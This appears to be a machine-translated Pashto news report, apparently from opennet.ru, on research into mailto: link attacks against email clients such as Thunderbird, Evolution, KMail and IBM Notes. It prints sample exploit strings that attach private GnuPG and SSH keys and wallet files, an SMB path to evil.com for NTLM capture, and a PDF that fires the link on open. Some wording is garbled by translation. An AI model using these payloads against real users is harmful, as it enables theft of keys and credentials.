د روهر پوهنتون بوخم (جرمني) څیړونکي () د بریښنالیک پیرودونکو چلند کله چې د پرمختللي پیرامیټونو سره "میلټو:" لینکونه پروسس کوي. د XNUMX بریښنالیک پیرودونکو څخه پنځه یې معاینه شوي د هغه برید لپاره زیان منونکي وو چې د "ضبط" پیرامیټر په کارولو سره د سرچینې بدیل اداره کوي. شپږ اضافي بریښنالیک پیرودونکي د PGP او S/MIME کلیدي بدیل برید لپاره زیان منونکي وو، او درې پیرودونکي د کوډ شوي پیغامونو مینځپانګې استخراج لپاره د برید لپاره زیان منونکي وو.
لینکونه »"د بریښنالیک پیرودونکي خلاصولو اتومات کولو لپاره کارول کیږي ترڅو په لینک کې مشخص شوي پتې ته یو لیک ولیکئ. د پتې سربیره، تاسو کولی شئ د لینک د یوې برخې په توګه اضافي پیرامیټونه مشخص کړئ، لکه د لیک موضوع او د عادي منځپانګې لپاره یوه نمونه. وړاندیز شوی برید د "ضبط" پیرامیټر بدلوي، کوم چې تاسو ته اجازه درکوي چې د تولید شوي پیغام سره ضمیمه وصل کړئ.
د میل پیرودونکي تندربرډ، د GNOME ارتقاء (CVE-2020-11879)، KDE KMail (CVE-2020-11880)، IBM/HCL نوټونه (CVE-2020-4089) او پیګاسس میل د یو کوچني برید لپاره زیان منونکي وو چې تاسو ته اجازه درکوي په اتوماتيک ډول ضمیمه کړئ هر ځایی فایل، د لینک له لارې مشخص شوی لکه "mailto:?attach=path_to_file". فایل د خبرتیا ښودلو پرته ضمیمه شوی ، نو د ځانګړي پاملرنې پرته ، کارونکي ممکن پام ونه کړي چې لیک به د ضمیمې سره لیږل کیږي.
د مثال په توګه، د لینک کارول لکه "میلټو:[ایمیل خوندي شوی]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" تاسو کولی شئ د GnuPG څخه شخصي کیلي په لیک کې دننه کړئ. تاسو کولی شئ د کریپټو والټونو مینځپانګې هم واستوئ (~/.bitcoin/wallet.dat) ، SSH کیلي (~/.ssh/id_rsa) او هر هغه فایلونه چې کارونکي ته د لاسرسي وړ وي. برسېره پردې، تندربرډ تاسو ته اجازه درکوي چې د "attach=/tmp/*.txt" په څیر ساختمانونو په کارولو سره د ماسک په واسطه د فایلونو ګروپونه ضمیمه کړئ.
د ځایی فایلونو سربیره، ځینې بریښنالیک پیرودونکي د شبکې ذخیره کولو او د IMAP سرور کې لارې ته لینکونه پروسس کوي. په ځانګړې توګه، د IBM یادښتونه تاسو ته اجازه درکوي د شبکې له لارښود څخه فایل انتقال کړئ کله چې لینکونه پروسس کوي لکه "attach=\\evil.com\dummyfile"، او همدارنګه د برید کونکي لخوا کنټرول شوي SMB سرور ته د لینک لیږلو سره د NTLM تصدیق کولو پیرامیټونه مداخله کوي. (غوښتنه به د اوسني تصدیق پیرامیټونو کارونکي سره لیږل کیږي).
تندربرډ په بریالیتوب سره غوښتنې پروسس کوي لکه "attach=imap:///fetch>UID>/INBOX>1/"، کوم چې تاسو ته اجازه درکوي د IMAP سرور کې د فولډرونو څخه مینځپانګې ضمیمه کړئ. په ورته وخت کې، د IMAP څخه ترلاسه شوي پیغامونه، د OpenPGP او S/MIME له لارې کوډ شوي، د لیږلو دمخه د میل پیرودونکي لخوا په اتوماتيک ډول کوډ شوي. د تندربرډ پراختیا کونکي وو د فبروري په میاشت کې د ستونزې په اړه او په مسله کې ستونزه لا دمخه حل شوې ده (د تندربرډ څانګې 52، 60 او 68 زیان منونکي پاتې دي).
د تندربرډ پخوانۍ نسخې د PGP او S/MIME په اړه د څیړونکو لخوا وړاندیز شوي دوه نورو برید ډولونو ته هم زیان منونکي وو. په ځانګړې توګه، Thunderbird، او همدارنګه OutLook، PostBox، eM مراجع، MailMate او R2Mail2، د کلیدي بدیل برید تابع و، د دې حقیقت له امله چې د میل پیرودونکی په اتوماتيک ډول د S/MIME پیغامونو کې لیږدول شوي نوي سندونه واردوي او نصبوي، کوم چې اجازه ورکوي برید کونکی د عامه کیلي بدیل تنظیموي چې دمخه د کارونکي لخوا زیرمه شوي.
دوهم برید، چې تندربرډ، پوسټ بکس او میل میټ حساس دي، د مسودې پیغامونو د اتوماتیک خوندي کولو میکانیزم ځانګړتیاوې سمبالوي او د میلټو پیرامیټونو په کارولو سره اجازه ورکوي چې د کوډ شوي پیغامونو ډیکریپشن پیل کړي یا د خپل سري پیغامونو لپاره ډیجیټل لاسلیک اضافه کړي. د برید کونکي IMAP سرور ته د پایلې وروسته لیږد. په دې برید کې، سیفر متن د "باډي" پیرامیټر له لارې لیږدول کیږي، او د "میټا ریفریش" ټګ د برید کونکي IMAP سرور ته د زنګ وهلو لپاره کارول کیږي. د مثال په ډول: ' '
د کارونکي متقابل عمل پرته په اتوماتيک ډول د "میلټو:" لینکونو پروسس کولو لپاره ، په ځانګړي ډول ډیزاین شوي PDF سندونه کارول کیدی شي - په PDF کې د OpenAction عمل تاسو ته اجازه درکوي په اتوماتيک ډول د میلټو هینډلر لانچ کړئ کله چې یو سند خلاص کړئ:
%PDF-1.5
1 0 اعتراض
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 اعتراض
<< /Type /Action /S /URI/URI (mailto:?body=—— پیل PGP پیغام——[…])>>
endobj
سرچینه: opennet.ru